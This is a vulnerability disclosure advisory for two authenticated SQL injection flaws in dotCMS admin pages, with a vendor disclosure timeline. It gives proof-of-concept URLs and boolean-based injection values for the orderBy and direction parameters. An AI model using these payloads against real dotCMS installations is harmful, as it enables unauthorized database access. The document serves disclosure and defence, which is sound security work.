Title: Multiple SQL injection vulnerabilities in dotCMS (2x CVE)
Credit: Elar Lang / https://security.elarlang.eu
Vendor/Product: dotCMS (http://dotcms.com/)
Vulnerability: SQL injection
Vulnerable version: before 4.1.1. Theoretically would be fixed in
3.7.2 (not released yet)
CVE: CVE-2016-10007, CVE-2016-10008
# Multiple SQL injections in dotCMS framework.
I had already reported 8 SQL injection vulnerabilities to dotCMS and I
was curious as to how they fixed it.
With checking fixes I found 2 new vulnerabilites but for those I had
to bypass blacklist defence.
## CVE-2016-10007 - "Marketing" > Forms" page,
_EXT_FORM_HANDLER_orderBy parameter
An SQL injection vulnerability in the "Marketing > Forms" screen in
dotCMS before 3.7.2 (not released) and 4.1.1 allows remote
authenticated attackers to execute arbitrary SQL commands via the
_EXT_FORM_HANDLER_orderBy parameter.
Preconditions: the attacker must be authenticated and authorized as an
administrator.
Proof-of-Concept URL (from "Admin Site" UI: "Marketing > Forms", click
on some column title in the resultset table):
/c/portal/layout?p_l_id=89594b95-1354-4a63-8867-c922880107df&p_p_id=EXT_FORM_HANDLER&p_p_action=1&p_p_state=maximized&p_p_mode=view&_EXT_FORM_HANDLER_struts_action=%2Fext%2Fformhandler%2Fview_form&_EXT_FORM_HANDLER_orderBy=SQLi&_EXT_FORM_HANDLER_direction=asc
Proof-of-Concept values for parameter _EXT_FORM_HANDLER_orderBy.
Precondition for this example: there must be at least 2 different rows
in the resultset and ordering by name and description field should
give different ordering (if they don't, use some other field names)
-- boolean true - output is ordered by name field
_EXT_FORM_HANDLER_orderBy=case when 1=1 then name else description end
-- boolean false - output is ordered by descriotion field
_EXT_FORM_HANDLER_orderBy=case when 1=0 then name else description end
## CVE-2016-10008 - "Content Types > Content Types" page,
_EXT_STRUCTURE_direction parameter
An SQL injection vulnerability in the "Content Types > Content Types"
screen in dotCMS before 3.7.2 (not released) and 4.1.1 allows remote
authenticated attackers to execute arbitrary SQL commands via the
_EXT_STRUCTURE_direction parameter parameter.
Preconditions: the attacker must be authenticated and authorized as an
administrator.
Proof-of-Concept URL (from "Admin Site" UI: "Content Types > Content
Types", click on some column title in the resultset table):
demo.dotcms.com/c/portal/layout?p_l_id=56fedb43-dbbf-4ce2-8b77-41fb73bad015&p_p_id=EXT_STRUCTURE&p_p_action=1&p_p_state=maximized&p_p_mode=view&_EXT_STRUCTURE_struts_action=%2Fext%2Fstructure%2Fview_structure&_EXT_STRUCTURE_orderBy=velocity_var_name&_EXT_STRUCTURE_direction=SQLi
# Vulnerability Disclosure Timeline
2016-10-24 | me > dotCMS | SQLi Poc
2016-10-25 | dotCMS > me | Thanks for PoC
2016-12-19 | me > dotCMS | Informed CVE numbers, asked status for
reported issues.
2016-12-19 | dotCMS > me | Low priority, not planning fixing in next release
2016-12-19 | me > dotCMS | agreed with low priority (requires
authenticated user in administrator privileges)
2017-03-03 | me > dotCMS | I can see many new releases, is it fixed? [2]
2017-03-06 | dotCMS > me | No. Probably will be not addressed until
the project to refactor our admin interface is completed.
2017-06-16 | dotCMS | dotCMS version 4.1.1 release
2017-07-18 | me > dotCMS | As I need to publich CVEs at some point,
what is the status?
2017-07-21 | dotCMS > me | Fixes are available on 4.1.1. Would it be
possible to wait 3 to 4 weeks so we can release 3.7.2?
2017-10-10 | me > dotCMS | "3 to 4 weeks" passed, how it is going with 3.7.2?
2017-10-17 | dotCMS > me | "Thank you for your patience! Thank you for
your email! It prompted me to push the developer to finish getting
this release out the door. I will email you next week with an update."
This "next week" never arrived ;)
2018-02-11 | me | Full Disclosure on http://security.elarlang.eu
# Related fixes and releases
https://dotcms.com/docs/latest/change-log#release-4.1.1
# More detailed (inc some code review and blacklist bypass)
description is available in blog:
https://security.elarlang.eu/cve-2016-10007-and-cve-2016-10008-2-sql-injection-vulnerabilities-in-dotcms-blacklist-defence-bypass.html
--
Elar Lang
Blog @ https://security.elarlang.eu
Pentester, lecturer @ http://www.clarifiedsecurity.com